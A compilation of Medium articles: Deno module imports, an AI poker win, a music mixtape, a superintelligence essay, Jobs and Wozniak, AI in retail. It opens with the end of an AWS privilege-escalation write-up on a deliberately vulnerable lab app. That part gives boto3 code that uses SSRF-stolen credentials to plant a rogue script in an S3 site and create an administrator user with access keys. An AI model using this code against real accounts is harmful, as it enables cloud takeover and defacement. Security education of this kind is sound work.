access to resources Now, if the domain name of the DVCA is a “root” domain (that has no subdomain), chances are that the underlying S3 Bucket name is the same as the domain name, because of the way Route53 Alias Records makes it just easier to work this way. We can use this to modify the static website and inject a rogue mining script in it (for example), effectively defacing the static S3 website! s3_client = boto3.client( 's3', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) s3_client.put_object(Body=rogue_bytes, Bucket='domain.name', Key='index.html') Also note that s3:ListBucket permission which also enables the serverless equivalent of directory listing… Taking over Let’s say your Web Application has the right to create roles (a role for each customer, for example) and that this permission was implemented as - Effect: Allow Action: - iam:* # Living dangerously Resource: '*' (Very dangerous, but I am sure there are plenty of way too permissive implementations of this in the wild) for the sake of simplicity. Using the credentials retrieved through our SSRF technique and passing them to boto3 we are able to create a new Global Administrator user and create him Access Keys in just a few lines of python: iam_client = boto3.client( 'iam', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) iam_client.create_user( UserName='DVCA-RogueUser' ) iam_client.attach_user_policy( PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess', UserName='DVCA-RogueUser', ) key_response = iam_client.create_access_key(UserName='DVCA-RogueUser') In this example, the keys will be in the key_response object, which you can just print-out. At this point, you won. You basically own everything in this account. A rogue administrator user created using the backend’s credentials Future work: The Lambda Backend Even though I included a serverless Lambda backend in DVCA, I was not able to exploit it yet. In this case, the credentials are injected directly in Python's os.environ , but are not part of /proc/self/environ or /proc/self/task/1/environ . I know that they are injected at the bootstrap using lambda_runtime.receive_start() , but I am not sure they are anywhere to be found on the filesystem. AWS Lambdas also do not have a metadata endpoint from which we could fetch them. My next hypothesis would be to try to retrieve them from memory, by looking at /proc/self/map* files. So if you have an idea, drop a comment below! Happy hacking! :-)
https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6
['Maxime Leblanc']
2018-09-01 13:01:01.509000+00:00
['Information Security', 'Hacking', 'AWS', 'Cloud Computing', 'Cloudformation']
Using node modules in Deno
Photo by frank mckenna on Unsplash Using node modules in Deno A bad practice but sometimes there is no alternative. Last time we introduced about Deno and discussed how it compares to node, like node, Deno is a server side code-execution environment based on web technology. Node uses JavaScript with commonjs modules and npm/yarn as it’s package manager. Deno uses Typescript or JavaScript with modern javascript import statements. It does not need a package manager. To import a module as usual in deno you reference it by URL: import { serve } from "https://deno.land/std/http/server.ts"; You can find many of the modules you may need in the Deno standard library or in the Deno third party modules list but they don’t have everything. Sometimes you need to use a module which the maintainers have only made available through the npm ecosystem. Here are some methods from most convenient to least: 1. If the module already uses ES modules import/export syntax. The libraries you use from deno don’t have to come from the recommended Deno packages they can come from any URL, provided they use the modern import syntax. Using unpkg is a great way to access these files directly from inside an npm repo. import throttle from https://unpkg.com/[email protected]/throttle.js 2. If the module itself doesn’t use imports but the source code does If the module is compiled or in the wrong format though npm you may still have some luck if you take a look at the source code. Many popular libraries have moved away from using commonjs in their source code to the standards compliant es module import syntax. Some packages have a separate src/ and dist/ directory where the esmodule style code is in src/ which isn’t included in the package available through npm. In that case you can import from the source directly. import throttle from "https://raw.githubusercontent.com/lodash/lodash/master/throttle.js"; I got this URL by clicking on the “raw” button on github to get the raw JS file. It’s probably neater to use a github cdn or to see if the file is available through github pages, but this works. NB: Some libraries use esmodules with webpack, or a module loader which lets them import from node modules like this: Bad: import { someFunction } from "modulename"; import { someOtherFunction } from "modulename/file.js"; The standard for imports is that they need to start with ./ or be a URL to work Good: import { someOtherFunction } from "./folder/file.js"; In that situation try the next method: 3. Importing commonjs modules Fortunately there is a service called JSPM which will resolve the 3rd party modules and compile the commonjs modules to work as esmodule imports. This tool is for using node modules in the browser without a build step. But we can use it here too. The JSPM logo In my most recent project i wanted to do push notifications, which involves generating the credentials for VAPID, there is a deno crypto library which can do encryption but doing the full procedure is difficult and I’d rather use the popular web-push library. I can import it using the JSPM CDN using the URL like below: import webPush from "https://dev.jspm.io/web-push"; I can now use it like any other module in deno. This almost worked 100% some of the bits which relied on specific node behaviors such as making network requests failed in this situation I had to work around this to use the standardised fetch API deno uses. Getting Typescript types working One nice feature of typescipt, which deno uses, is that it provides really good autocomplete for modules. The deno extension for my editor even can autocomplete for third part modules if it knows the type definitions. This isn’t essential to getting the code to work but can provide huge benefits for helping you maintain your code. When I was importing another module called fast-xml-parser when I was looking through the source code I noticed it had a type definitions file which is a file which ends in .d.ts . These files describe the various interfaces and even work for even for JavaScript .js files. You can sometimes also find the type definitions files in the @types\somemodule repo. Using this file typescript can auto complete on things imported from JavaScript files. Even for files imported using JSPM: // Import the fast-xml-parser library import fastXMLParser from "https://dev.jspm.io/fast-xml-parser"; // Import the type definition file from the source code of fast-xml-parser import * as FastXMLParser from "https://raw.githubusercontent.com/NaturalIntelligence/fast-xml-parser/master/src/parser.d.ts"; // Use the parser with the types const parser = fastXMLParser as typeof FastXMLParser; I import the type definitions from the definition files as FastXMLParser (note the uppercase F) this doesn’t contain any working code but is an object which has the same type as the code we want to import. I import the code from JSPM as fastXMLParser (lowercase f) which is the working code but has no types. Next I combine them together to make parser which is fastXMLParser with the type of FastXMLParser . Thank you for reading, I hope you give deno a go. The ability to use any module made for the web and even some which were made for node/npm really gives this new server side library ecosystem a good foundation to get started from. 🦕
https://medium.com/samsung-internet-dev/using-node-modules-in-deno-2885600ed7a9
['Ada Rose Cannon']
2020-08-03 12:14:52.404000+00:00
['Deno', 'Nodejs', 'JavaScript', 'Samsung Internet', 'Web Development']
Poker? Done that. Now the next challenge…
IMAGE: Yuriy Davats — 123RF Poker, as has previously happened to chess and Go, has joined the games that a set of algorithms is already capable of playing better than the human champions can manage. On January 31, after twenty days of Heads Up, No Limit Texas Hold ’em, four people considered among the best professional poker players in the world were defeated by an artificial intelligence machine, Libratus, the product of the work of researchers of Carnegie Mellon directed by Tuomas Sandholm. Twenty days watching computer screens, playing about 120,000 hands, and meeting at night in their hotel rooms to coordinate joint strategies were not enough to beat an algorithm that quickly understood the strategies employed by humans and it soon overcame them. The game was clearly dominated by Libratus from the first moment: the human players were not even close to winning at any time. The aim of keeping the championship going to the end was to achieve a victory that could be considered statistically significant, that is to say, winning 99.7% of the time is hardly the product of chance. What really matters here is that the algorithms used were not specific to the game of poker, nor did they try to exploit the mistakes of the Libratus’s opponents. They simply took the rules of the game as their inputs and focused on improving their own strategy by taking into account the cards dealt, those on the table and the bets placed by each player. Texas Hold ’em, with its unlimited betting and the uncertainty of two hidden cards on whose potential values player speculate, offers a very good example of imperfect information play, and serves as an appetizer for other non-gambling activities such as negotiation, cybersecurity, finance, or even research on antiviral treatments (taking the mutations of the virus, whose genetic sequence is known, as uncertain variables that allow it to survive certain drugs). There are plenty of areas similar to poker: we’re no longer speaking about a machine that can learn the rules of a game and apply computational brute force to calculate. What Libratus’s victory means in simple terms is that artificial intelligence is better at making strategic decisions based on uncertain information than humans are. If you thought that a machine was only capable of repeating what it had been programmed to do, think again: a machine has been able to analyze 120,000 poker moves and, given the cards dealt it, the cards already on the table and the bets of each of its opponents, consistently won on a statistically significant number of occasions, enough to rule out luck or chance. So next time you sit down to play a hand of poker, remember that no matter how well you do, there is a machine out there that will always beat you. And from now on, that won’t just apply to card games…
https://medium.com/enrique-dans/poker-done-that-now-the-next-challenge-330b67b11a28
['Enrique Dans']
2017-02-02 22:29:22.028000+00:00
['AI', 'Poker', 'Algorithms', 'Artificial Intelligence', 'Machine Learning']
The Mixtape for Indie Rock Lovers Vol. 1
The Mixtape for Indie Rock Lovers Vol. 1 Rewind. Record. Repeat. As a late 80’s kid, the joy of discovering new music through hand-crafted compilations were easily shared through mixtapes. And even though I missed a portion of that era, I still remember running to my cassette player to hit record only to find out later that the first 30 seconds were missing. When cassette tapes became a thing of the past — CD burners made its way to the music scene and of course, I was pretty stoked in making my first mix. There was an art to crafting our own playlists that we could hand out to our friends, and accessing music through Spotify just doesn’t have the same je ne sais quoi. Before we get started, I just want to let you know that I spiralled down a black hole trying to define the term indie rock — which lead me to creating a lengthy article explaining the history behind it. Despite the slight distinctions in origins, calling this an “alternative” playlist could have been a better option. But in retrospect, creating my own sub-genres was a more exciting idea.
https://medium.com/narrative/the-mixtape-for-indie-rock-lovers-vol-1-e89a6cfddbbc
['Katy Velvet']
2019-05-04 06:40:20.985000+00:00
['Inspiration', 'Culture', 'Ideas', 'Creativity', 'Music']
Superintelligence Vs. You
Supposedly atheist intellectuals are now spending a lot of time arguing over the consequences of creating “God.” Often they refer to this supreme being as a “superintelligence,” an A.I. that, in their thought experiments, possesses magical traits far beyond just enhanced intelligence. Any belief system needs a positive and negative aspect, and for this new religion-replacement, the “hell” scenario is that this superintelligence we cannot control might decide to conquer and destroy the world. Like their antecedents—Hegel, Marx, J.S. Mill, Fukayama, and many others—these religion-replacement proposers view history as a progression toward some endpoint (often called a “singularity”). This particular eschaton involves the creation of a superintelligence that either uplifts us or condemns us. The religious impulse of humans—the need to attribute purpose to the universe and history—is irrepressible even among devoted atheists. And, unfortunately, this worldview has been taken seriously by normally serious thinkers. I and others have argued that rather than new technologies leading to some sort of end-of-history superintelligence, it’s much more likely that a “tangled bank” of all sorts of different machine intelligences will emerge: some small primitive A.I.s that mainly filter spam from email, some that drive, some that land planes, some that do taxes, etc. Some of these will be much more like individual cognitive modules, others more complex, but they will exist, like separate species, adapted to a particular niche. As with biological life, they will bloom across the planet in endless forms, most beautiful. This view is a lot closer to what’s actually happening in machine learning on a day-to-day basis. Evolution is an endless game that’s fundamentally nonprogressive. The logic behind this tangled bank is based on the fundamental limits of how you can build an intelligence as an integrated whole. Just like evolution, no intelligence can be good at solving all classes of problems. Adaptation and specialization are necessary. It’s this fact that ensures evolution is an endless game and makes it fundamentally nonprogressive. Organisms adapt to an environment, but that environment changes, maybe even due to that organism’s adaptation, and so on, for however long there is life. Put another way: Being good at some things makes it harder to do others, and no entity is good at everything. In a nonprogressive view, intelligence is, from a global perspective, very similar to fitness. Becoming more intelligent at X often makes you worse at Y, and so on. This ensures that intelligence, just like life, has no fundamental endpoint. Human minds struggle with this view because without an endpoint there doesn’t seem to be much of a point either. Despite the probable incoherence of a true superintelligence (all knowing, all seeing, etc.), some argue that, because we don’t fully know the formal constraints on building intelligences, it may be possible to build something that’s superintelligent in comparison to us and that operates over a similar class of problems. This more nuanced view argues that it might be possible to build something more intelligent than a human over precisely the kinds of domains humans are good at. This is kind of like an organism outcompeting another organism for the same niche. Certainly this isn’t in the immediate future. But let’s assume, in order to show that concerns about the creation of superintelligence as a world-ending eschaton are overblown, that it is indeed possible to build something 1,000x smarter than a human across every problem-solving domain we engage in. Even if that superintelligence were created tomorrow, I wouldn’t be worried. Such worries are based on a kind of Doctor Who-esque being. A being that, in any circumstance, can find some advantage via pure intelligence that enables victory to be snatched from the jaws of defeat. A being that, even if put in a box buried underground, would, just like Doctor Who, always be able to use its intelligence to both get out of the box and go on to conquer the entire world. Let’s put aside the God-like magical powers often granted superintelligences—like the ability to instantaneously simulate others’ consciousnesses just by talking to them or the ability to cure cancer without doing any experiments (you cannot solve X just by being smart if you don’t have sufficient data about X; ontology simply doesn’t work that way)—and just assume it’s merely a superintelligent agent lacking magic. The important thing to keep in mind is that Doctor Who is able to continuously use intelligence to solve situations because the show writers create it that way. The real world doesn’t constantly have easy shortcuts available; in the real world of chaotic dynamics and P!=NP and limited data, there aren’t orders-of-magnitude more efficient solutions to every problem in the human domain of problems. And it’s not that we fail to identify these solutions because we lack the intelligence. It’s because they don’t exist. An example of this is how often superintelligence can be beaten by a normal human at all sorts of tasks, given either the role of luck or small asymmetries between the human and the A.I. For example, imagine you are playing chess against a superintelligence of the 1,000x-smarter-than-humans-across-all-human-problem-solving-domains variety. If you’re one of the best chess-players in the world, you could at most hope for a tie, although you may never get one. Now let’s take pieces away from the superintelligence, giving it just pawns and its king. Even if you are, like me, not well-practiced at chess, you could easily defeat it. This is simply a no-win scenario for the superintelligence, as you crush it on the board, mercilessly trading piece for piece, backing it into a corner, finally toppling its king. That there are natural upper bounds on performance from being intelligent isn’t some unique property of chess and its variants. In fact, as strategy games get more complex, intelligence often matters less. Because the game gets chaotic, predictions are inherently less precise due to amplifying noise, available data for those predictions becomes more limited, and brute numbers, positions, resources, etc., begin to matter more. Let’s bump the complexity of the game you’re playing against the superintelligence up to the computer strategy game Starcraft. Again, assuming both players start perfectly equal, let’s grant the superintelligence an easy win. But, in this case, it would take only a minor change in the initial conditions to make winning impossible for the superintelligence. Tweaking, say, starting resources would put the superintelligence into all sorts of no-win scenarios against even a mediocre player. Even just delaying the superintelligence from starting the game by 30 seconds would probably be enough for great human players to consistently win. You can give the superintelligence whatever properties you want—maybe it thinks 1,000x faster than a human. But its game doesn’t run 1,000x faster, and by starting 30 seconds earlier, the human smokes it. Intelligence is only one of many things that affect the outcome of even the most strategic games — and often not a very important one. The point is that our judgments on how effective intelligence alone is for succeeding at a given task are based on situations when all other variables are fixed. Once you start manipulating those variables, instead of controlling for them, you see that intelligence is only one of many things that affect the outcome of even the most strategic games—and often not a very important one. We can think of a kind of ultimate strategy game called Conquer the World. You’re born into this world with whatever resources you start with, and you, a lone agent, must conquer the entire earth and all its nations, without dying. I hate to break it to you: There’s no way to consistently win this game. It’s not just because it’s a hard game. It’s because there is no way to consistently win this game, no matter your intelligence or strategy—it just doesn’t exist. The real world doesn’t have polarity reversals and there are many tasks with no shortcuts. The great whirlwind of limbs, births, deaths, careers, lovers, companies, children, consumption, nations, armies—that is, the great globe-spanning multitudinous mass that is humanity—has so many resources and numbers and momentum it is absurd to think that any lone entity could, by itself, ever win a war against us, no matter how intelligent that entity was. It’s like a Starcraft game where the superintelligence starts with one drone and we start with literally the entire map covered by our bases. It doesn’t matter how that drone behaves, it’s just a no-win scenario. Barring magical abilities, a single superintelligence, with everything beyond its senses hidden in the fog of war, with limited data, dealing with the exigencies and chaos and limitations that define the physical world, is in a no-win scenario against humanity. And a superintelligence, if it’s at all intelligent, would know this. Of course, no thought experiment or argument is going to convince someone out of a progressive account of history, particularly if the progressive account operates to provide morality, structure, and meaning to what would otherwise be a cold and empty universe. Eventually the workers must rise up, or equality for all must be achieved, or the chosen nation-state must bestride the world, or we must all be uplifted into a digital heaven or thrown into oblivion. To think otherwise is almost impossible. Human minds need a superframe that contains all others, that endows them with meaning, and it’s incredibly difficult to operate without one. This “singularity” is as good as any other, I suppose. Humans just don’t do well with nonprogressive processes. The reason it took so long to come up with the theory of evolution by natural selection, despite its relatively simple logic and armchair-derivability, is its nonprogressive nature. These are things without linear frames, without beginnings or ends or reasons why. When I was studying evolutionary theory back in college, I remember at one moment feeling a dark logic click into place: Life was inevitable, design inevitable, yet it needed no watchmaker and had no point, and that this pointlessness was the reason why I was, why everyone was. But such a thought is slippery, impossible to hold onto for a human, to really keep believing in the trenches of the everyday. And so, when serious thinkers fall for silly thoughts about history coming to an end, we shouldn’t judge. Each of us, after all, engages in such silliness every morning when we get out of bed.
https://medium.com/s/story/superintelligence-vs-you-1e4a77177936
['Erik Hoel']
2019-02-05 22:18:39.533000+00:00
['Machine Learning', 'Technology', 'Artificial Intelligence', 'Robots', 'Future']
Steve Jobs’ Dark Past
Steve Jobs’ Dark Past The time Steve Job’s cheated his way to success Steve Wozniak Atari and Steve Jobs Image source: (Photo by Reuters) Steve Wozniak on Breakout, Atari and Steve Jobs I believe that most people have a dark past, a past that they wish won’t come to light, but sooner or later you have to take that pressure off your chest and come clean. This is what Steve Jobs did about the fact of how he tricked his best friend into working all night long for several days and then cheating him out of his paycheck. This proved to be only the first offense in a long litany of his penchant for pettiness and pointless cruelty. The friend that I am talking about is Steve Wozniak, him and Jobs were working at Atari, one of the first video game consoles which revolutionized the video game market. The owner of Atari at the time was its actual founder by the name of Nolan Bushnell. The first game that came out was “Pong,” a classic which many people remember. Due to its high success, Bushnell thought of making a sequel that would be only a single-player and call it “Breakout” in 1975. Appearances can be deceiving For this project, Bushnell was thinking of tasking Steve Jobs to be in charge and take care of the project. Jobs was considered (at the time) a low-level Atari technician with huge potential. As this game was expected to be much better than its predecessor, Jobs recruited Steve Wozniak, who was known on the market as the better engineer. Jobs and Wozniak had been friends for quite some time at that point. They both were working towards the Apple 1 which would follow to become the most iconic computer around the world for four long years so they got to spend a lot of time together. The way that Atari worked was by offering a monetary bonus for every chip fewer than fifty that was used when building a game. Wozniak was ecstatic when Jobs asked him to help with this big project. This is when Jobs started to lie to Wozniak in order to use him for his expertise. He told Wozniak that the deadline was four days and that he had to use as few chips as possible. The truth is that Jobs was given a whole month for this project, not four days. Jobs never told Wozniak about the bonus for using fewer chips and the four-day deadline was self-imposed by Jobs, as he needed to get back to his commune farm to help bring in the apple harvest. It is imperative to mention (for those who are not aware) that Steve Jobs came from a very poor background. Wozniak was working for Hewlett-Packard at the time as well, so he had to balance his main job as well as this project. So he would end up going to his job in the day time and spending most of the night working on “Breakout”. The only thing that Steve did was implementing the required chips, making sure that there were less than fifty chips. Their herculean efforts succeeded, as they finished the game in four days and only using forty-five chips. When payday came, Steve Jobs only gave Wozniak half the pay, he kept the rest of his pay as well as the bonus for himself. Wozniak only found out about this ten years later. He is quoted in the Isaacson biography Steve Jobs: “When he talks about it now, there are long pauses, and he admits it causes him pain.” “I wish he had just been honest. If he had told me he needed the money, he should have known I would have just given it to him. He was a friend. You help your friends.” “Ethics always mattered to me, and I still don’t understand why he would have gotten paid one thing and told me he’d gotten paid another. But, you know, people are different.” Quotes are taken from Steve Jobs: The Exclusive Biography by Walter Isaacson Wozniak, to his credit, did not hold this against Jobs in later years. The reason why Jobs did this is unknown to the public, many think it was his need for money to keep on working at the Apple 1 computer, whilst others say that those are his true colors. I am not here to judge Steve Jobs as I believe we all, at some point in time, chose the wrong path, especially in our younger years.
https://medium.com/history-of-yesterday/steve-jobss-dark-past-55a98044f3b4
['Andrei Tapalaga']
2020-11-06 14:21:13.517000+00:00
['History', 'Marketing', 'Business', 'Life Lessons', 'Entrepreneurship']
Complete guide to machine learning and deep learning in retail
Complete guide to machine learning and deep learning in retail The stores aren’t dead yet Stores are changing. We see it happening before our eyes, even if we don’t always realize it. Little by little, they are becoming just one extra step in an increasingly complex customer journey. Thanks to digitalisation and retail automation, the store is no longer an end in itself, but a mean of serving the needs of the brand at large. The quality of the experience, a feeling of belonging and recognition, the comfort of the purchase… all these parameters now matter as much as sales per square meter, and must therefore submit themselves to the optimizations prescribed by Data Science and its “intelligent algorithms” (aka artificial Intelligence in the form of machine learning and deep learning). The use of artificial intelligence is, above all, a competitive necessity. Indeed, e-commerce players did not wait on anyone: note, for example, the adaptation of online search results to the end customer, or the recommendations made based on a digital profile. These two aspects are impossible for brick and mortar (for now). However, physical commerce has its own strengths. Olfactory, visual, auditory, etc. data can be used to give the consumer a feeling of having experienced something unique and made specifically for them. In addition to customer relationship improvements, artificial intelligence also makes it possible to seek the resolution of problems that have long represented a burden for retailers : better inventory management, optimization of store space, optimization of employee time… We present below a complete look at deep learning/ machine learning use cases implemented to create the store of the future, supported by real-life examples. 1. Adapting the store and its inventory to better serve customers It’s a known fact that e-commerce actors can optimize their websites in real time using dynamic statistics. This allows them to define the most effective strategies according to the resources available and predefined customers segmentation. Like any physical space, the store does not have this luxury. However, this does not prevent the periodic optimization of physical spaces, thanks to insights gleaned from intelligent algorithms. Back in the days (less than 20 years ago), we’d hire students to follow and count customers in specific areas of the store. Thankfully, these times are over. Heat-maps, average route diagrams, time spent on screens, various ratios in relation to total attendance, correlations… the cameras in store and computer vision algorithms now provide actionable tools based on images. Today, heat-mapping and activity recognition solutions help not only to position promotions, but also to create entire marketing strategies, and to measure the performance of each department, as well as that of product placements. Solutions offered by the likes of RetailFlux can analyze store videos to give retailers data on the number of people in their store, the path they take once inside and where they linger. This helps marketers identify popular locations, allowing them to change the layout of furnishings, displays, advertising or staff to better serve their customers and increase revenue. As technologies evolve, we are also starting to hear about “demographic recognition”: these tools, created by start-ups such as DeepVision AI, MyStore-e, RetailDeep and RetailNext, allow us to estimate the age and gender of people passing in front of a camera, thus giving stores access to a whole new granularity of analyzes. This aspect is paramount to the rationalisation now expected of marketers and category managers. Although these cameras are often hung from the ceiling, this is not always the case: Walgreens (in partnership with Cooler Screens), for example, recently integrated cameras, sensors and digital screens in the doors of its stores’ coolers to create a network of “smart” displays that brands can use to target ads to specific types of customers. The doors act as a digital merchandising platform that depicts food and beverages in their best light, but also as an in-store billboard that can show ads to consumers who are approaching, based on variables such as approximate age, gender and current weather. Cameras and sensors inside the connected coolers can also determine which items buyers have picked up or viewed, giving advertisers insight into how their promotions work on the screen, and quickly notifying a retailer if a product is no longer in stock. The key question thus shifts from “where” and “how many” to “who”, “when”, “how often”, “how long” and “for how many cookies?”. 2. Forecasting to increase profits These data, mixed with those from check-outs and loyalty programs, are key to forecasting demand and creating store clusters, which in turn improves retailers’ supply chains. By better predicting what products will do well in a certain area, machine learning algorithms from startups such as Symphony RetailAI can reduce dead stock, help optimise pricing (and profits), and increase customer loyalty (people obviously tend to enjoy finding the right product mix in their nearest store). Indeed, unsold stock might be one of the retail industry’s biggest handicaps: unused inventory costs U.S retailers about $50 billion a year. Reducing this number is key to the industry’s long-term survival : every dollar spent on what becomes dead inventory is valuable money that could have been put towards training talent, better R&D, or, most obviously, brand new smart algorithms. Forecasting also helps retailers optimisise their promotions : the less dead stocks are in the warehouse, the more strategic promotions can be, instead of being merely reactionary. Many pricing aficionados will particularly appreciate this aspect, as it will make their job a lot easier, and a lot less thankless. 3. Personnalisation to promote an in-store experience In the same way that a website can adapt in real time to end users, an increased granularity of computer vision is also possible in stores, allowing it to target individuals. However, these algorithms are based on more elements than the ones presented above, and are thus more complex/less reliable. To work at a personal level, the algorithms need a mix of demographic recognition, loyalty code identification, and augmented reality, often integrated into smart objects such as mirrors. Although they cannot (yet) be implemented on a large scale, these solutions exemplify a profound change in the way stores sell. We are moving from the sale of product to the sale of experiences, where the physical offer becomes a by-product. This is the concept of shoppertainment. Low prices and an extensive catalog are no longer enough for customers, who can find such a value proposition online. An authentic brand experience becomes key to survival : the store is a storehouse of engaging experiences, ideas and interactions. The use cases are of course numerous (even if they often border on the sci-fi technobabble side of the AI equator): during 2019’s NRF, Google presented a connected mirror which links visual recognition data and the stores product database. In the case of an optical store for example, the mirror can recognize the model tested and display product or marketing information concerning it. The sellers also have statistics on the use of the mirror in real time: they know that the person who has tried a certain type of glasses has been there for some time or hesitates between two pairs. This facilitates the work of the seller who can thus advise the customer on the products which really interest them. H&M has for its part allied itself with Microsoft to test a mirror allowing to take selfies thanks to voice commands, while Lululemon’s mirror acts more like a board which encourages its customers to engage with the community created and maintained by the brand. Smart mirrors can of course be placed at different intervals of the purchasing process: Ralph Lauren’s is located in the fitting room to transform the often frustrating experience of trying out clothes. Buyers can interact with the mirror to change the lighting in their fitting room and can select different sizes or colors for their outfits, which an employee will get. The mirror also recommends other items that would go well with what is being tried. Cosmetic companies have also adopted these solutions: the Sephora smart mirror uses an intelligent algorithm which mixes the gender, age, appearance and style of the person looking at it in order to make recommendations. It even claims to differentiate between people wearing neutral or bright colors, daring or conservative styles and clothes with floral and geometric patterns to name a few. Through deep learning, we are also seeing a new technique emerge : affective computing. It is the ability of computers to recognize, interpret, and possibly stimulate emotions. It is indeed possible to identify gestures such as head and body movements, while a voice’s tone can also speak volumes about an individual’s emotional state. These insights can be used in the store so as not to generate an inconvenience for a customer who clearly does not need to be helped or bothered. These technologies are nevertheless new (only Releyeble offers retail use cases) and intrusive: it is therefore preferable not to comment yet on future use cases. 4. Making the shopping experience smoother for the customer Mirrors, augmented reality, virtual reality … they rarely respond to real pain points for retailers and their customers. And we know these pain points by heart : checkout length, quick product localization and inventory management… those should be priorities for stores looking for ways to use machine learning and deep learning solutions. Reducing friction at checkout In China, for example, customers of certain KFCs can, thanks to Alipay technology, make a purchase by placing themselves in front of a POS equipped with cameras, after having linked an image of their face to a digital payment system or bank account. The American chain Caliburger has also tested the idea of ​​facial recognition in some of its restaurants: the first time customers order using in-stores kiosks, they are invited to link their faces to their account using (NEC’s) NeoFace’s facial recognition software in order to benefit from numerous advantages. Payment by bank card is still necessary, but the company intends to switch to payment by facial recognition if the initial test phase is successful. Fears over cybersecurity could however prevent this kind of solution from seeing the light of day on a large scale. Indeed, customers are more and more jealous of their personal data (and rightly so): according to a Wavestone study, only 11% of consumers are ready to submit to facial recognition in stores. For recognition by mobile application, this figure rises to 40%. Other, more viable, ways to use computer vision to make checkout more fluid are therefore being considered. We are by now all familiar with Amazon Go’s automated stores (not too familiar, one hopes), which allow customers with a Prime account to enter the store with a code on their phones, do their shopping, and exit the store without going through a checkout. An algorithm having “followed” the customer around, the amount of purchases is automatically debited, and an invoice is sent by email. Testing of this technology is also underway at Casino, in partnership with XXII. There are many start-ups in this space: Standard Cognition, Zippin, Trigo Vision… all claim to help companies eliminate the checkout of customers. China, meanwhile, is casually reworking the very concept of the store through the Bingo-Box by Auchan. Reducing stock-outs All these cameras can be used to see more than customers: many solutions for monitoring shelves have indeed emerged. They offer to send an alert to employees in the event of a shortage, which allows for a prompt response. This is key for stores: stockouts represent more than $129 billion in lost sales in North America each year (~4% of revenues). Not only that, but stock-outs can also actively drive customers into the arms of competition: 24% of Amazon’s revenue comes from customers who have experienced a stock-out at a local retailer. There are many examples of such solutions: in France, Angus AI works with Les Mousquetaires. In the US, Walmart has been working on this concept since last year, as has ABInbev with Focal Systems. Interestingly, Yoobic’s solution offers a similar process, but the camera is in the hands of individuals in order to take the photos that will be analyzed by the algorithms. In China, meanwhile, Hema (Alibaba’s store of the future) is pushing the border of augmented stores more than anywhere else in the world. Shopping advices through Voice technology Of course, images aren’t the only things that can be analyzed in store; voice also has a role to play in streamlining customer journeys. This under-appreciated method of shopping is due for a small revolution: 13% of all households in the United States owned a smart speaker in 2017, per OC&C Strategy Consultants. That number is predicted to rise to 55% by 2022. The fact that Amazon is also a leader in voice technologies shows how serious the Seattle giant is in terms of its brick-and-mortar domination (having already conquered virtual spaces). The brand’s Echo Buds, launched in 2019 work with Alexa to answer any questions it understands while a customer is on the move. More interestingly for retail, it also informs the user if the closest Whole Foods (Amazon owns Whole Foods) has an item a customer is looking for. Once they are informed and in the store, the Echo Buds can direct them to the right aisle. You can imagine Alexa not only guiding you to an item, but if you tell it that you want to make lasagna, it could also guide you through a store, giving you the quickest way to pick up all the necessary ingredients. The future is ear (get it?). Virtual assistants are indeed on the rise. The Mars Agency, for example, has partnered with American retailer BevMo! to test SmartAisle, a digital whiskey purchase assistant. By mixing artificial intelligence, voice-activated technology and LED lights on the shelves, SmartAisle helps buyers choose the perfect whiskey bottle. Three bottles are recommended after a quick conversation, and the relevant shelves light up to lead the customer to the preferred bottles. If customers already have a brand in mind, the assistant can recommend other brands or bottles with similar flavor profiles. The whole experience lasts no more than 2 minutes. The voice assistant makes it a pleasant and informative experience, with a mix of banter and useful information. From NLP to virtual assistants, the two examples above show that, if used well, Voice technology can free more employee time, and give key data to retailers. Robotic automation The discussion on improving and streamlining processes would not be complete without a discussion around robotics. These objects, long relegated to science fiction, are now showing their usefulness in stores around the world. Although robotics is not in itself a subcategory of artificial intelligence, robots roaming the aisles use notions of computer vision and NLP. Just like Amazon, Walmart is here too at the cutting edge of technology: Bossa Nova robots (called “Auto-S”), which are designed to scan items on the shelves to help with price accuracy and restocking, are already present in 1000 of their stores. These six feet tall devices contain 15 cameras each, which scan shelves and send alerts to employees in real time. This frees workers from the need to focus on repeatable, predictable and manual tasks, giving them time to focus more on sales and customer service. Walmart has also introduced robots that clean floors, unload and sort items from trucks and pick up orders in stores. It is interesting to note that this niche is quickly becoming highly competitive, Simbe’s robots have been deployed in Schnuck store across America, with the same value proposition as Bossa Nova, while Lowe’s unveiled in 2016 a robot that can understand and respond to simple customer questions. Post-coronavirus, it is almost certain that the movement towards robotics will accelerate in the coming months. 5. Loss prevention “Shrinkage” (theft) has an enormous cost: €49 billion per year on a European scale (2.1% of annual turnover in the distribution sector), weighing heavy on the margins of distributors already highly pressurized by price wars. Security therefore becomes a pressing need. And because of costs, so does automation. This can take many forms. Augmented cameras, for example, can identify if a product has been hidden, and alert a human. This would, however, produce a lot of false positives due to the physical impossibility of an all-knowing camera. Companies such as Vaak or DeepCam AI claim to be able to avoid this problem by alerting someone only if the behavior of a visitor is highly suspicious. Solutions such as StopLift also offer to detect “sweethearting” (an employee pretending to make a transaction, but in fact giving a product to an acquaintance without payment). It is important to remember that a large percentage of store thefts go through employees. The ROI of these solutions is easy to calculate: stores know exactly how much they lose from theft and errors. As such, this use case is likely to be one of the first to be implemented. Conclusion In view of all these developments, and despite their many positives for both retailers and customers, it is essential that customers question retailers about who has access to data and how it is used. It goes without saying that transparency must be the watchword of any use of personal data in order to guarantee consumers the preservation of their private life. If you’re eager to get going with your very own corporate A.I project, I recommend jumping straight to my latest article on the matter : 10 Steps to your very own Corporate Artificial Intelligence project.
https://towardsdatascience.com/complete-guide-to-machine-learning-and-deep-learning-in-retail-ca4e05639806
['Adrien Book']
2020-05-15 16:41:57.390000+00:00
['Retail Technology', 'AI', 'Retail', 'Artificial Intelligence', 'Deep Learning']
Orchestrating change data capture to a data lake
